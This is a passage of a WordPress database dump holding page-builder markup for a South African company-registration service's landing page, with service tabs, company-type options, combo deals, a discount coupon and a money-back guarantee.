_builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" hover_enabled=\"0\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_text_color=\"rgba(0,0,0,0)\" button_bg_color=\"#eb007e\" button_bg_enable_color=\"on\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:42:28','2019-08-08 08:42:28','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32396,3,'2019-08-08 10:44:41','2019-08-08 08:44:41','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" 